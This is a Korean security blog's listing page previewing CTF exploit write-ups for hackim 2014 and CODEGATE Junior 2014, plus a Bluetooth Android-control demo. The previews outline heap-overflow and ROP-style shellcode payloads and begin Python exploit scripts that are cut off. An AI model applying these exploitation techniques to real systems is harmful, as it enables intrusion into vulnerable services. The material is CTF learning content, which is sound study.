본문 바로가기
반응형

Security100

[exploit] hackim 2014 exploit 300 # 1. malloc(0x100)과 malloc(0)을 생성. # 2. malloc(0)의 size는 stage2에서 버퍼를 채움으로써 변경가능 # 3. strcpy(0x100, 0x110)으로 Heap Overflow 발생 # 4. [Heeeeeeeeaaaaaaaaaaapppp][Function1][Function2] 힙을 채움으로써 function1을 덮을수 있음 # 5. function1은 [pop ret]로 덮음 # 6. 그 후 stage 4 코드대로 쉘코드 실행 import struct p = lambda x: struct.pack(" 2014. 2. 11.
[exploit] CODEGATE Junior 2014 nuclear import socket import struct import time p = lambda x:struct.pack(" 2014. 2. 10.
bluetooth를 이용한 안드로이드폰 제어 2014년 1월에 처음으로 열린 경남권 세미나에서 발표한 "Bluetooth Security"의 Demo코드를 공개하겠습니다. 블루투스를 공부하면서 스마트폰을 제어할 수 있는 코드를 작성해봤는데요. 구조는 아주 간단하니 다 보이실거에요^^ ※악용의 소지가 될 수 있으므로 사용법은 공개하지 않겠습니다. (질문 환영입니다~!! 물론 태클도 환영해요. 점프연습 많이 해둘게요 ㅋㅋ 다 피해버리겠어 +_+) Atcommand : 전화단말기나 블루투스를 제어하기 위한 명령어(현재 버전이 오르면서 막힌 명령어도 많음) # Infomation 1. Language : Python 2.7.6 2. OS : Kali Linux (It's not virtual machine) 3. Smartphone : Samsun.. 2014. 2. 7.
[exploit] hackim 2014 exploit 200 import socket import struct ip = "192.168.0.14" port = 6776 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #payload = [strcpy] [pp ret] [freespace] [0xFF] [strcpy] [pp ret] [freespace+1] [0xE4] [freespace] [shellcode] # or [strcpy] [pp ret] [freespace] [0xFFE4] [freespace] [shellcode] strcpy = struct.pack(" 2014. 2. 7.